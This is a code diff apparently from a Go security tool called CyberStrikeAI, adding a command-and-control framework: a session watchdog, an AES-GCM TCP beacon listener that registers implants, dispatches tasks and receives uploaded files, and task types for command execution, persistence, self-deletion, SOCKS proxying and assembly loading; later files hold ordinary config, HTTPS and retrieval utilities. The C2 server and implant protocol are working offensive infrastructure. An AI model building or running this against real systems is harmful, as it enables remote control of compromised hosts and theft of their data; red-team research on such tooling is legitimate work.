@@ -0,0 +1,109 @@
package c2
import (
"context"
"time"
"cyberstrike-ai/internal/database"
"go.uber.org/zap"
)
// SessionWatchdog 会话心跳看门狗:周期扫描所有 active/sleeping 会话,
// 把超过 (sleep * (1 + jitter%) * graceFactor + minGrace) 仍未心跳的标为 dead。
//
// 设计要点:
// - 单 goroutine + ticker,避免对每个会话开 timersession 数量大时也线性 OK
// - 阈值随会话自身 sleep/jitter 自适应(sleep=300s 的会话不能用 sleep=5s 的判定);
// - 全局最小宽限期 minGrace 避免 sleep 配置错误的会话被误判;
// - 不读 implant_uuid,纯按 last_check_in 字段,与 listener 类型解耦。
type SessionWatchdog struct {
manager *Manager
logger *zap.Logger
interval time.Duration // 扫描周期,默认 15s
minGrace time.Duration // 最小宽限期,默认 30s
gracePct float64 // 心跳超时倍数,默认 3.0(即 3 倍 sleep 周期没心跳算掉线)
stopCh chan struct{}
}
// NewSessionWatchdog 创建看门狗
func NewSessionWatchdog(m *Manager) *SessionWatchdog {
return &SessionWatchdog{
manager: m,
logger: m.Logger().With(zap.String("component", "c2-watchdog")),
interval: 15 * time.Second,
minGrace: 30 * time.Second,
gracePct: 3.0,
stopCh: make(chan struct{}),
}
}
// Run 阻塞执行,直到 ctx.Done() 或 Stop()
func (w *SessionWatchdog) Run(ctx context.Context) {
t := time.NewTicker(w.interval)
defer t.Stop()
for {
select {
case <-ctx.Done():
return
case <-w.stopCh:
return
case <-t.C:
w.tick()
}
}
}
// Stop 停止
func (w *SessionWatchdog) Stop() {
select {
case <-w.stopCh:
default:
close(w.stopCh)
}
}
func (w *SessionWatchdog) tick() {
now := time.Now()
for _, status := range []string{string(SessionActive), string(SessionSleeping)} {
sessions, err := w.manager.DB().ListC2Sessions(database.ListC2SessionsFilter{Status: status})
if err != nil {
w.logger.Warn("watchdog 列表查询失败", zap.Error(err))
continue
}
for _, s := range sessions {
if w.isStale(s, now) {
if err := w.manager.MarkSessionDead(s.ID); err != nil {
w.logger.Warn("标记会话掉线失败", zap.String("session_id", s.ID), zap.Error(err))
}
}
}
}
}
// isStale 判断会话是否超时
func (w *SessionWatchdog) isStale(s *database.C2Session, now time.Time) bool {
// 无心跳记录:以 first_seen_at 兜底
last := s.LastCheckIn
if last.IsZero() {
last = s.FirstSeenAt
}
sleep := s.SleepSeconds
if sleep <= 0 {
// TCP reverse 模式 sleep=0 → 用最小宽限期判定
return now.Sub(last) > w.minGrace*2
}
jitter := s.JitterPercent
if jitter < 0 {
jitter = 0
}
if jitter > 100 {
jitter = 100
}
// 阈值 = sleep * (1 + jitter%) * gracePct,再加 minGrace 兜底
expected := time.Duration(float64(sleep)*(1+float64(jitter)/100.0)*w.gracePct) * time.Second
if expected < w.minGrace {
expected = w.minGrace
}
return now.Sub(last) > expected
}
+267
View File
@@ -0,0 +1,267 @@
package c2
import (
"bufio"
"crypto/subtle"
"encoding/base64"
"encoding/binary"
"encoding/json"
"fmt"
"io"
"net"
"os"
"path/filepath"
"strings"
"sync"
"time"
"cyberstrike-ai/internal/database"
"go.uber.org/zap"
)
// tcpBeaconMagic 二进制 Beacon 在反向 TCP 连接建立后首先发送的 4 字节,用于与经典 shell 反弹区分。
const tcpBeaconMagic = "CSB1"
// tcpBeaconMaxFrame 单帧密文(base64 字符串)最大字节数,防止 OOM。
const tcpBeaconMaxFrame = 64 << 20
func readTCPBeaconFrame(r *bufio.Reader) (cipherB64 string, err error) {
var n uint32
if err = binary.Read(r, binary.BigEndian, &n); err != nil {
return "", err
}
if n == 0 || int64(n) > int64(tcpBeaconMaxFrame) {
return "", fmt.Errorf("invalid tcp beacon frame size")
}
buf := make([]byte, n)
if _, err = io.ReadFull(r, buf); err != nil {
return "", err
}
return string(buf), nil
}
func writeTCPBeaconFrame(mu *sync.Mutex, conn net.Conn, cipherB64 string) error {
if mu != nil {
mu.Lock()
defer mu.Unlock()
}
payload := []byte(cipherB64)
if len(payload) > tcpBeaconMaxFrame {
return fmt.Errorf("frame too large")
}
var hdr [4]byte
binary.BigEndian.PutUint32(hdr[:], uint32(len(payload)))
if _, err := conn.Write(hdr[:]); err != nil {
return err
}
_, err := conn.Write(payload)
return err
}
func tcpBeaconCheckToken(expected, got string) bool {
if got == "" || expected == "" {
return false
}
return subtle.ConstantTimeCompare([]byte(got), []byte(expected)) == 1
}
// handleTCPBeaconSession 处理已消费魔数 CSB1 之后的 TCP Beacon 会话(与 HTTP Beacon 相同的 AES-GCM + JSON 语义)。
func (l *TCPReverseListener) handleTCPBeaconSession(conn net.Conn, br *bufio.Reader) {
var writeMu sync.Mutex
defer func() {
_ = conn.Close()
}()
for {
_ = conn.SetReadDeadline(time.Now().Add(6 * time.Minute))
cipherB64, err := readTCPBeaconFrame(br)
if err != nil {
if err != io.EOF && !isClosedConnErr(err) {
l.logger.Debug("tcp beacon read frame", zap.Error(err))
}
return
}
plain, err := DecryptAESGCM(l.rec.EncryptionKey, cipherB64)
if err != nil {
l.logger.Warn("tcp beacon decrypt failed", zap.Error(err))
return
}
var env map[string]json.RawMessage
if err := json.Unmarshal(plain, &env); err != nil {
l.logger.Warn("tcp beacon json", zap.Error(err))
return
}
opBytes, ok := env["op"]
if !ok {
return
}
var op string
if err := json.Unmarshal(opBytes, &op); err != nil {
return
}
var token string
if tb, ok := env["token"]; ok {
_ = json.Unmarshal(tb, &token)
}
if !tcpBeaconCheckToken(l.rec.ImplantToken, token) {
l.logger.Warn("tcp beacon bad token", zap.String("listener_id", l.rec.ID))
return
}
var resp interface{}
switch op {
case "check_in":
rawCheck, ok := env["check"]
if !ok {
return
}
var req ImplantCheckInRequest
if err := json.Unmarshal(rawCheck, &req); err != nil {
return
}
if req.UserAgent == "" {
req.UserAgent = "tcp_beacon"
}
if req.SleepSeconds <= 0 {
req.SleepSeconds = l.cfg.DefaultSleep
}
host, _, _ := net.SplitHostPort(conn.RemoteAddr().String())
if req.Metadata == nil {
req.Metadata = map[string]interface{}{}
}
req.Metadata["transport"] = "tcp_beacon"
req.Metadata["remote"] = conn.RemoteAddr().String()
if strings.TrimSpace(req.InternalIP) == "" {
req.InternalIP = host
}
session, err := l.manager.IngestCheckIn(l.rec.ID, req)
if err != nil {
l.logger.Warn("tcp beacon check_in", zap.Error(err))
return
}
queued, _ := l.manager.DB().ListC2Tasks(database.ListC2TasksFilter{
SessionID: session.ID,
Status: string(TaskQueued),
Limit: 1,
})
resp = ImplantCheckInResponse{
SessionID: session.ID,
NextSleep: session.SleepSeconds,
NextJitter: session.JitterPercent,
HasTasks: len(queued) > 0,
ServerTime: NowUnixMillis(),
}
case "tasks":
rawSID, ok := env["session_id"]
if !ok {
return
}
var sessionID string
if err := json.Unmarshal(rawSID, &sessionID); err != nil || sessionID == "" {
return
}
sess, err := l.manager.DB().GetC2Session(sessionID)
if err != nil || sess == nil || sess.ListenerID != l.rec.ID {
return
}
envelopes, err := l.manager.PopTasksForBeacon(sessionID, 50)
if err != nil {
return
}
if envelopes == nil {
envelopes = []TaskEnvelope{}
}
resp = map[string]interface{}{"tasks": envelopes}
case "result":
raw, ok := env["result"]
if !ok {
return
}
var report TaskResultReport
if err := json.Unmarshal(raw, &report); err != nil {
return
}
if err := l.manager.IngestTaskResult(report); err != nil {
return
}
resp = map[string]string{"ok": "1"}
case "upload":
raw, ok := env["upload"]
if !ok {
return
}
var up struct {
TaskID string `json:"task_id"`
DataB64 string `json:"data_b64"`
}
if err := json.Unmarshal(raw, &up); err != nil || up.TaskID == "" {
return
}
plainFile, err := base64.StdEncoding.DecodeString(up.DataB64)
if err != nil {
return
}
dir := filepath.Join(l.manager.StorageDir(), "uploads")
if err := os.MkdirAll(dir, 0o755); err != nil {
return
}
dst := filepath.Join(dir, up.TaskID+".bin")
if err := os.WriteFile(dst, plainFile, 0o644); err != nil {
return
}
resp = map[string]interface{}{"ok": 1, "size": len(plainFile)}
case "file":
raw, ok := env["file"]
if !ok {
return
}
var fr struct {
FileID string `json:"file_id"`
}
if err := json.Unmarshal(raw, &fr); err != nil || fr.FileID == "" {
return
}
if strings.Contains(fr.FileID, "/") || strings.Contains(fr.FileID, "\\") || strings.Contains(fr.FileID, "..") {
return
}
fpath := filepath.Join(l.manager.StorageDir(), "downstream", fr.FileID+".bin")
absPath, err := filepath.Abs(fpath)
if err != nil {
return
}
absDir, err := filepath.Abs(filepath.Join(l.manager.StorageDir(), "downstream"))
if err != nil || !strings.HasPrefix(absPath, absDir+string(filepath.Separator)) {
return
}
data, err := os.ReadFile(absPath)
if err != nil {
return
}
resp = map[string]interface{}{
"file_data": base64Encode(data),
}
default:
return
}
body, err := json.Marshal(resp)
if err != nil {
return
}
enc, err := EncryptAESGCM(l.rec.EncryptionKey, body)
if err != nil {
return
}
_ = conn.SetWriteDeadline(time.Now().Add(3 * time.Minute))
if err := writeTCPBeaconFrame(&writeMu, conn, enc); err != nil {
return
}
}
}
+258
View File
@@ -0,0 +1,258 @@
// Package c2 实现 CyberStrikeAI 内置 C2Command & Control)框架。
//
// 设计概述:
// - Manager 作为统一入口,被 internal/app 实例化并注入到所有需要操控 C2 的组件
// HTTP handler、MCP 工具、HITL 桥、攻击链记录器等)。
// - Listener 是抽象接口,下挂 tcp_reverse / http_beacon / https_beacon / websocket
// 等不同传输方式的具体实现,全部通过 listener.Registry 工厂创建。
// - 任务调度走数据库(c2_tasks 表)+ 内存事件总线(EventBus)混合:
// * 状态变化与历史记录靠 SQLite 实现持久化与重启恢复;
// * 高频实时通知(如新任务结果)通过 EventBus 推送给 SSE/WS 订阅者,避免轮询。
// - Crypto 层固定 AES-256-GCM,每个 Listener 独立 32 字节密钥;密钥仅服务端持有
// 和编译期注入到 implant,事件流不允许导出明文密钥。
package c2
import (
"errors"
"strings"
"time"
)
// ListenerType 监听器类型,与 c2_listeners.type 字段一致
type ListenerType string
const (
ListenerTypeTCPReverse ListenerType = "tcp_reverse"
ListenerTypeHTTPBeacon ListenerType = "http_beacon"
ListenerTypeHTTPSBeacon ListenerType = "https_beacon"
ListenerTypeWebSocket ListenerType = "websocket"
)
// AllListenerTypes 列出所有受支持的监听器类型,便于校验与前端枚举
func AllListenerTypes() []ListenerType {
return []ListenerType{
ListenerTypeTCPReverse,
ListenerTypeHTTPBeacon,
ListenerTypeHTTPSBeacon,
ListenerTypeWebSocket,
}
}
// IsValidListenerType 校验前端/MCP 入参是否为合法 type
func IsValidListenerType(t string) bool {
t = strings.ToLower(strings.TrimSpace(t))
for _, lt := range AllListenerTypes() {
if string(lt) == t {
return true
}
}
return false
}
// SessionStatus 与 c2_sessions.status 一致
type SessionStatus string
const (
SessionActive SessionStatus = "active"
SessionSleeping SessionStatus = "sleeping"
SessionDead SessionStatus = "dead"
SessionKilled SessionStatus = "killed"
)
// TaskStatus 与 c2_tasks.status 一致
type TaskStatus string
const (
TaskQueued TaskStatus = "queued"
TaskSent TaskStatus = "sent"
TaskRunning TaskStatus = "running"
TaskSuccess TaskStatus = "success"
TaskFailed TaskStatus = "failed"
TaskCancelled TaskStatus = "cancelled"
)
// TaskType 任务类型(与 beacon 端协商,避免硬编码字符串)
type TaskType string
const (
// 通用任务
TaskTypeExec TaskType = "exec" // 执行任意命令(shell -c
TaskTypeShell TaskType = "shell" // 交互式命令(保持 cwd
TaskTypePwd TaskType = "pwd" // 当前目录
TaskTypeCd TaskType = "cd" // 切目录
TaskTypeLs TaskType = "ls" // 列目录
TaskTypePs TaskType = "ps" // 列进程
TaskTypeKillProc TaskType = "kill_proc" // 杀进程
TaskTypeUpload TaskType = "upload" // 推文件到目标
TaskTypeDownload TaskType = "download" // 拉文件回本机
TaskTypeScreenshot TaskType = "screenshot" // 截图
TaskTypeSleep TaskType = "sleep" // 调整心跳节律
TaskTypeExit TaskType = "exit" // 让 implant 退出(不会自删二进制)
TaskTypeSelfDelete TaskType = "self_delete" // 退出 + 自删二进制(持久化清理)
// 高级任务
TaskTypePortFwd TaskType = "port_fwd"
TaskTypeSocksStart TaskType = "socks_start"
TaskTypeSocksStop TaskType = "socks_stop"
TaskTypeLoadAssembly TaskType = "load_assembly"
TaskTypePersist TaskType = "persist"
)
// AllTaskTypes 全部 task_type,便于工具 schema 列出 enum
func AllTaskTypes() []TaskType {
return []TaskType{
TaskTypeExec, TaskTypeShell,
TaskTypePwd, TaskTypeCd, TaskTypeLs, TaskTypePs, TaskTypeKillProc,
TaskTypeUpload, TaskTypeDownload, TaskTypeScreenshot,
TaskTypeSleep, TaskTypeExit, TaskTypeSelfDelete,
TaskTypePortFwd, TaskTypeSocksStart, TaskTypeSocksStop, TaskTypeLoadAssembly,
TaskTypePersist,
}
}
// IsDangerousTaskType 标记需要 HITL 二次确认的任务类型;
// 与 internal/handler/hitl.go 现有的 tool_whitelist 概念呼应:白名单外 → 走审批。
func IsDangerousTaskType(t TaskType) bool {
switch t {
case TaskTypeKillProc, TaskTypeUpload, TaskTypeSelfDelete,
TaskTypePortFwd, TaskTypeSocksStart, TaskTypeLoadAssembly, TaskTypePersist:
return true
}
return false
}
// ListenerConfig 解码后的监听器运行配置(来自 c2_listeners.config_json
type ListenerConfig struct {
// HTTP/HTTPS Beacon 公共字段
BeaconCheckInPath string `json:"beacon_check_in_path,omitempty"` // 默认 "/check_in"
BeaconTasksPath string `json:"beacon_tasks_path,omitempty"` // 默认 "/tasks"
BeaconResultPath string `json:"beacon_result_path,omitempty"` // 默认 "/result"
BeaconUploadPath string `json:"beacon_upload_path,omitempty"` // 默认 "/upload"
BeaconFilePath string `json:"beacon_file_path,omitempty"` // 默认 "/file/"
// HTTPS 专属
TLSCertPath string `json:"tls_cert_path,omitempty"`
TLSKeyPath string `json:"tls_key_path,omitempty"`
TLSAutoSelfSign bool `json:"tls_auto_self_sign,omitempty"` // true:找不到证书时自动生成自签
// 客户端默认参数(写到 c2_sessions 初值,beacon 也可在 check-in 时覆写)
DefaultSleep int `json:"default_sleep,omitempty"` // 秒,默认 5
DefaultJitter int `json:"default_jitter,omitempty"` // 0-100,默认 0
// OPSEC:可选命令黑名单(正则)
CommandDenyRegex []string `json:"command_deny_regex,omitempty"`
// 任务并发上限(每个会话同时下发的最大任务数,0 表示不限制)
MaxConcurrentTasks int `json:"max_concurrent_tasks,omitempty"`
// CallbackHost 植入端/Payload 使用的回连主机名(可选);与 bind_host 分离,便于 NAT/ECS 等场景
CallbackHost string `json:"callback_host,omitempty"`
}
// ApplyDefaults 对未填字段填默认值;调用方负责持久化时序列化新值
func (c *ListenerConfig) ApplyDefaults() {
if strings.TrimSpace(c.BeaconCheckInPath) == "" {
c.BeaconCheckInPath = "/check_in"
}
if strings.TrimSpace(c.BeaconTasksPath) == "" {
c.BeaconTasksPath = "/tasks"
}
if strings.TrimSpace(c.BeaconResultPath) == "" {
c.BeaconResultPath = "/result"
}
if strings.TrimSpace(c.BeaconUploadPath) == "" {
c.BeaconUploadPath = "/upload"
}
if strings.TrimSpace(c.BeaconFilePath) == "" {
c.BeaconFilePath = "/file/"
}
if c.DefaultSleep <= 0 {
c.DefaultSleep = 5
}
if c.DefaultJitter < 0 {
c.DefaultJitter = 0
}
if c.DefaultJitter > 100 {
c.DefaultJitter = 100
}
}
// ImplantCheckInRequest beacon → 服务端的注册/心跳请求体(已解密后的明文)
type ImplantCheckInRequest struct {
ImplantUUID string `json:"uuid"`
Hostname string `json:"hostname"`
Username string `json:"username"`
OS string `json:"os"`
Arch string `json:"arch"`
PID int `json:"pid"`
ProcessName string `json:"process_name"`
IsAdmin bool `json:"is_admin"`
InternalIP string `json:"internal_ip"`
UserAgent string `json:"user_agent,omitempty"`
SleepSeconds int `json:"sleep_seconds"`
JitterPercent int `json:"jitter_percent"`
Metadata map[string]interface{} `json:"metadata,omitempty"`
}
// ImplantCheckInResponse 服务端回执
type ImplantCheckInResponse struct {
SessionID string `json:"session_id"`
NextSleep int `json:"next_sleep"`
NextJitter int `json:"next_jitter"`
HasTasks bool `json:"has_tasks"`
ServerTime int64 `json:"server_time"`
}
// TaskEnvelope 服务端 → beacon 的任务派发载体
type TaskEnvelope struct {
TaskID string `json:"task_id"`
TaskType string `json:"task_type"`
Payload map[string]interface{} `json:"payload"`
}
// TaskResultReport beacon → 服务端的任务结果回传
type TaskResultReport struct {
TaskID string `json:"task_id"`
Success bool `json:"success"`
Output string `json:"output,omitempty"`
Error string `json:"error,omitempty"`
BlobBase64 string `json:"blob_b64,omitempty"` // 如截图二进制
BlobSuffix string `json:"blob_suffix,omitempty"` // 如 ".png"
StartedAt int64 `json:"started_at"`
EndedAt int64 `json:"ended_at"`
}
// CommonError C2 模块统一错误类型,便于 handler 层映射 HTTP 状态码
type CommonError struct {
Code string
Message string
HTTP int
}
func (e *CommonError) Error() string {
if e == nil {
return ""
}
return e.Message
}
// Sentinel errors,便于 errors.Is 比较
var (
ErrListenerNotFound = &CommonError{Code: "listener_not_found", Message: "监听器不存在", HTTP: 404}
ErrSessionNotFound = &CommonError{Code: "session_not_found", Message: "会话不存在", HTTP: 404}
ErrTaskNotFound = &CommonError{Code: "task_not_found", Message: "任务不存在", HTTP: 404}
ErrProfileNotFound = &CommonError{Code: "profile_not_found", Message: "Profile 不存在", HTTP: 404}
ErrInvalidInput = &CommonError{Code: "invalid_input", Message: "参数非法", HTTP: 400}
ErrAuthFailed = &CommonError{Code: "auth_failed", Message: "鉴权失败", HTTP: 401}
ErrPortInUse = &CommonError{Code: "port_in_use", Message: "端口已被占用", HTTP: 409}
ErrListenerRunning = &CommonError{Code: "listener_running", Message: "监听器已在运行", HTTP: 409}
ErrListenerStopped = &CommonError{Code: "listener_stopped", Message: "监听器未运行", HTTP: 409}
ErrUnsupportedType = &CommonError{Code: "unsupported_type", Message: "不支持的监听器类型", HTTP: 400}
)
// SafeBindPort 校验端口范围
func SafeBindPort(port int) error {
if port < 1 || port > 65535 {
return errors.New("port must be in 1..65535")
}
return nil
}
// NowUnixMillis 统一时间戳工具
func NowUnixMillis() int64 {
return time.Now().UnixNano() / int64(time.Millisecond)
}
+1304
View File
File diff suppressed because it is too large Load Diff
+66
View File
@@ -0,0 +1,66 @@
package config
import (
"os"
"strings"
)
// expandEnvVar 展开字符串中的 ${VAR} 和 ${VAR:-default} 环境变量引用。
// 与官方 MCP 配置格式一致(Claude Desktop / Cursor / VS Code 均支持此语法)。
func expandEnvVar(s string) string {
var b strings.Builder
i := 0
for i < len(s) {
// 查找 ${
idx := strings.Index(s[i:], "${")
if idx < 0 {
b.WriteString(s[i:])
break
}
b.WriteString(s[i : i+idx])
i += idx + 2 // skip ${
// 查找对应的 }
end := strings.IndexByte(s[i:], '}')
if end < 0 {
// 没有 },原样保留
b.WriteString("${")
continue
}
expr := s[i : i+end]
i += end + 1 // skip }
// 解析 VAR:-default
varName := expr
defaultVal := ""
hasDefault := false
if colonIdx := strings.Index(expr, ":-"); colonIdx >= 0 {
varName = expr[:colonIdx]
defaultVal = expr[colonIdx+2:]
hasDefault = true
}
val := os.Getenv(varName)
if val == "" && hasDefault {
val = defaultVal
}
b.WriteString(val)
}
return b.String()
}
// ExpandConfigEnv 展开 ExternalMCPServerConfig 中所有支持环境变量的字段。
// 展开范围:Command、Args、Env values、URL、Headers values。
func ExpandConfigEnv(cfg *ExternalMCPServerConfig) {
cfg.Command = expandEnvVar(cfg.Command)
for i, arg := range cfg.Args {
cfg.Args[i] = expandEnvVar(arg)
}
for k, v := range cfg.Env {
cfg.Env[k] = expandEnvVar(v)
}
cfg.URL = expandEnvVar(cfg.URL)
for k, v := range cfg.Headers {
cfg.Headers[k] = expandEnvVar(v)
}
}
+81
View File
@@ -0,0 +1,81 @@
package config
import (
"os"
"testing"
)
func TestExpandEnvVar(t *testing.T) {
os.Setenv("TEST_MCP_VAR", "hello")
os.Setenv("TEST_MCP_PATH", "/usr/local/bin")
defer os.Unsetenv("TEST_MCP_VAR")
defer os.Unsetenv("TEST_MCP_PATH")
tests := []struct {
name string
input string
expect string
}{
{"plain string", "no vars here", "no vars here"},
{"empty string", "", ""},
{"simple var", "${TEST_MCP_VAR}", "hello"},
{"var in middle", "prefix-${TEST_MCP_VAR}-suffix", "prefix-hello-suffix"},
{"multiple vars", "${TEST_MCP_PATH}/${TEST_MCP_VAR}", "/usr/local/bin/hello"},
{"missing var empty", "${NONEXISTENT_MCP_VAR_XYZ}", ""},
{"default value used", "${NONEXISTENT_MCP_VAR_XYZ:-fallback}", "fallback"},
{"default not used", "${TEST_MCP_VAR:-unused}", "hello"},
{"default with path", "${NONEXISTENT_MCP_VAR_XYZ:-/tmp/default}", "/tmp/default"},
{"unclosed brace", "${UNCLOSED", "${UNCLOSED"},
{"dollar without brace", "$PLAIN", "$PLAIN"},
{"empty var name", "${}", ""},
{"default empty var", "${:-default}", "default"},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
got := expandEnvVar(tt.input)
if got != tt.expect {
t.Errorf("expandEnvVar(%q) = %q, want %q", tt.input, got, tt.expect)
}
})
}
}
func TestExpandConfigEnv(t *testing.T) {
os.Setenv("TEST_MCP_CMD", "python3")
os.Setenv("TEST_MCP_TOKEN", "secret123")
defer os.Unsetenv("TEST_MCP_CMD")
defer os.Unsetenv("TEST_MCP_TOKEN")
cfg := &ExternalMCPServerConfig{
Command: "${TEST_MCP_CMD}",
Args: []string{"--token", "${TEST_MCP_TOKEN}", "${MISSING:-default_arg}"},
Env: map[string]string{"API_KEY": "${TEST_MCP_TOKEN}", "LEVEL": "${MISSING:-INFO}"},
URL: "https://${MISSING:-example.com}/mcp",
Headers: map[string]string{"Authorization": "Bearer ${TEST_MCP_TOKEN}"},
}
ExpandConfigEnv(cfg)
if cfg.Command != "python3" {
t.Errorf("Command = %q, want %q", cfg.Command, "python3")
}
if cfg.Args[1] != "secret123" {
t.Errorf("Args[1] = %q, want %q", cfg.Args[1], "secret123")
}
if cfg.Args[2] != "default_arg" {
t.Errorf("Args[2] = %q, want %q", cfg.Args[2], "default_arg")
}
if cfg.Env["API_KEY"] != "secret123" {
t.Errorf("Env[API_KEY] = %q, want %q", cfg.Env["API_KEY"], "secret123")
}
if cfg.Env["LEVEL"] != "INFO" {
t.Errorf("Env[LEVEL] = %q, want %q", cfg.Env["LEVEL"], "INFO")
}
if cfg.URL != "https://example.com/mcp" {
t.Errorf("URL = %q, want %q", cfg.URL, "https://example.com/mcp")
}
if cfg.Headers["Authorization"] != "Bearer secret123" {
t.Errorf("Headers[Authorization] = %q, want %q", cfg.Headers["Authorization"], "Bearer secret123")
}
}
+46
View File
@@ -0,0 +1,46 @@
package config
import "strings"
// MainWebUIUsesHTTPS 判断主 Web UI 是否以 HTTPS 监听(与 internal/app.prepareMainServerTLS 前置条件一致)。
func MainWebUIUsesHTTPS(s *ServerConfig) bool {
if s == nil {
return false
}
if s.TLSEnabled {
return true
}
if s.TLSAutoSelfSign {
return true
}
cert := strings.TrimSpace(s.TLSCertPath)
key := strings.TrimSpace(s.TLSKeyPath)
return cert != "" && key != ""
}
// ServerHTTPRedirectEnabled 是否在主站启用 HTTPS 时把明文 HTTP 请求重定向到 HTTPS(默认开启)。
func ServerHTTPRedirectEnabled(s *ServerConfig) bool {
if s == nil || !MainWebUIUsesHTTPS(s) {
return false
}
if s.TLSHTTPRedirect == nil {
return true
}
return *s.TLSHTTPRedirect
}
// ApplyDevHTTPSBootstrap 供 --https / 一键脚本使用:强制开启主站 TLS。
// 若已配置 tls_cert_path 与 tls_key_path 则仅用 PEM,不开启自签;否则启用 tls_auto_self_sign(内存证书,仅本地测试)。
func ApplyDevHTTPSBootstrap(cfg *Config) {
if cfg == nil {
return
}
cfg.Server.TLSEnabled = true
cert := strings.TrimSpace(cfg.Server.TLSCertPath)
key := strings.TrimSpace(cfg.Server.TLSKeyPath)
if cert != "" && key != "" {
cfg.Server.TLSAutoSelfSign = false
return
}
cfg.Server.TLSAutoSelfSign = true
}
+67
View File
@@ -0,0 +1,67 @@
package knowledge
import (
"context"
"fmt"
"strings"
"github.com/cloudwego/eino-ext/components/document/transformer/splitter/markdown"
"github.com/cloudwego/eino-ext/components/document/transformer/splitter/recursive"
"github.com/cloudwego/eino/components/document"
"github.com/pkoukk/tiktoken-go"
)
func tokenizerLenFunc(embeddingModel string) func(string) int {
fallback := func(s string) int {
r := []rune(s)
if len(r) == 0 {
return 0
}
return (len(r) + 3) / 4
}
m := strings.TrimSpace(embeddingModel)
if m == "" {
return fallback
}
tok, err := tiktoken.EncodingForModel(m)
if err != nil {
return fallback
}
return func(s string) int {
return len(tok.Encode(s, nil, nil))
}
}
// newKnowledgeSplitter builds an Eino recursive text splitter. LenFunc uses tiktoken for
// embeddingModel when available, else rune/4 approximation.
func newKnowledgeSplitter(chunkSize, overlap int, embeddingModel string) (document.Transformer, error) {
if chunkSize <= 0 {
return nil, fmt.Errorf("chunk size must be positive")
}
if overlap < 0 {
overlap = 0
}
return recursive.NewSplitter(context.Background(), &recursive.Config{
ChunkSize: chunkSize,
OverlapSize: overlap,
LenFunc: tokenizerLenFunc(embeddingModel),
Separators: []string{
"\n\n", "\n## ", "\n### ", "\n#### ", "\n",
"。", "", "", ". ", "? ", "! ",
" ",
},
})
}
// newMarkdownHeaderSplitter Eino-ext Markdown 按标题切分(#####),适合技术/Markdown 知识库。
func newMarkdownHeaderSplitter(ctx context.Context) (document.Transformer, error) {
return markdown.NewHeaderSplitter(ctx, &markdown.HeaderConfig{
Headers: map[string]string{
"#": "h1",
"##": "h2",
"###": "h3",
"####": "h4",
},
TrimHeaders: false,
})
}
+129
View File
@@ -0,0 +1,129 @@
package knowledge
import (
"fmt"
"strings"
)
// Document metadata keys for Eino schema.Document flowing through the RAG pipeline.
const (
metaKBCategory = "kb_category"
metaKBTitle = "kb_title"
metaKBItemID = "kb_item_id"
metaKBChunkIndex = "kb_chunk_index"
metaSimilarity = "similarity"
)
// DSL keys for [VectorEinoRetriever.Retrieve] via [retriever.WithDSLInfo].
const (
DSLRiskType = "risk_type"
DSLSimilarityThreshold = "similarity_threshold"
DSLSubIndexFilter = "sub_index_filter"
)
// FormatEmbeddingInput matches the historical indexing format so existing embeddings
// stay comparable if users skip reindex; new indexes use the same string shape.
func FormatEmbeddingInput(category, title, chunkText string) string {
return fmt.Sprintf("[风险类型:%s] [标题:%s]\n%s", category, title, chunkText)
}
// FormatQueryEmbeddingText builds the string embedded at query time so it matches
// [FormatEmbeddingInput] for the same risk category (title left empty for queries).
func FormatQueryEmbeddingText(riskType, query string) string {
q := strings.TrimSpace(query)
rt := strings.TrimSpace(riskType)
if rt != "" {
return FormatEmbeddingInput(rt, "", q)
}
return q
}
// MetaLookupString returns metadata string value or "" if absent.
func MetaLookupString(md map[string]any, key string) string {
if md == nil {
return ""
}
v, ok := md[key]
if !ok || v == nil {
return ""
}
switch t := v.(type) {
case string:
return t
default:
return strings.TrimSpace(fmt.Sprint(t))
}
}
// MetaStringOK returns trimmed non-empty string and true if present and non-empty.
func MetaStringOK(md map[string]any, key string) (string, bool) {
s := strings.TrimSpace(MetaLookupString(md, key))
if s == "" {
return "", false
}
return s, true
}
// RequireMetaString requires a non-empty string metadata field.
func RequireMetaString(md map[string]any, key string) (string, error) {
s, ok := MetaStringOK(md, key)
if !ok {
return "", fmt.Errorf("missing or empty metadata %q", key)
}
return s, nil
}
// RequireMetaInt requires an integer metadata field.
func RequireMetaInt(md map[string]any, key string) (int, error) {
if md == nil {
return 0, fmt.Errorf("missing metadata key %q", key)
}
v, ok := md[key]
if !ok {
return 0, fmt.Errorf("missing metadata key %q", key)
}
switch t := v.(type) {
case int:
return t, nil
case int32:
return int(t), nil
case int64:
return int(t), nil
case float64:
return int(t), nil
default:
return 0, fmt.Errorf("metadata %q: unsupported type %T", key, v)
}
}
// DSLNumeric coerces DSL map values (e.g. from JSON) to float64.
func DSLNumeric(v any) (float64, bool) {
switch t := v.(type) {
case float64:
return t, true
case float32:
return float64(t), true
case int:
return float64(t), true
case int64:
return float64(t), true
case uint32:
return float64(t), true
case uint64:
return float64(t), true
default:
return 0, false
}
}
// MetaFloat64OK reads a float metadata value.
func MetaFloat64OK(md map[string]any, key string) (float64, bool) {
if md == nil {
return 0, false
}
v, ok := md[key]
if !ok {
return 0, false
}
return DSLNumeric(v)
}
+14
View File
@@ -0,0 +1,14 @@
package knowledge
import "testing"
func TestFormatQueryEmbeddingText_AlignsWithIndexPrefix(t *testing.T) {
q := FormatQueryEmbeddingText("XSS", "payload")
want := FormatEmbeddingInput("XSS", "", "payload")
if q != want {
t.Fatalf("query embed text mismatch:\n got: %q\nwant: %q", q, want)
}
if FormatQueryEmbeddingText("", "hello") != "hello" {
t.Fatalf("expected bare query without risk type")
}
}
+25
View File
@@ -0,0 +1,25 @@
package knowledge
import (
"context"
"fmt"
"github.com/cloudwego/eino/compose"
"github.com/cloudwego/eino/schema"
)
// BuildKnowledgeRetrieveChain 编译「查询字符串 → 文档列表」的 Eino Chain,底层为 SQLite 向量检索([VectorEinoRetriever])。
// 去重、上下文预算截断与最终 Top-K 均在 [VectorEinoRetriever.Retrieve] 内完成,与 HTTP/MCP 检索路径一致。
func BuildKnowledgeRetrieveChain(ctx context.Context, r *Retriever) (compose.Runnable[string, []*schema.Document], error) {
if r == nil {
return nil, fmt.Errorf("retriever is nil")
}
ch := compose.NewChain[string, []*schema.Document]()
ch.AppendRetriever(r.AsEinoRetriever())
return ch.Compile(ctx)
}
// CompileRetrieveChain 等价于 [BuildKnowledgeRetrieveChain](ctx, r)。
func (r *Retriever) CompileRetrieveChain(ctx context.Context) (compose.Runnable[string, []*schema.Document], error) {
return BuildKnowledgeRetrieveChain(ctx, r)
}
+23
View File
@@ -0,0 +1,23 @@
package knowledge
import (
"context"
"testing"
"go.uber.org/zap"
)
func TestBuildKnowledgeRetrieveChain_Compile(t *testing.T) {
